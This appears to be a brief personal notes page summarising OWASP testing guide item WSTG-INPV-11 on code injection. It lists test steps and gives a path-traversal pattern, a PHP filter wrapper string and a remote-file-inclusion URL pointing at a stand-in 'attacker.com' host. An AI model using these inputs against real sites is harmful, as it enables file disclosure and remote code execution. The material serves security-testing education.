Testing for Code Injection
OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.11. Testing for Code Injection
ID | Link to Hackinglife | Link to OWASP | Description |
---|---|---|---|
7.11 | WSTG-INPV-11 | Testing for Code Injection | - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity. |
Local File Inclusion
See my notes on Local File Inclusion
Last update: 2024-04-03 Created: December 26, 2023 19:00:18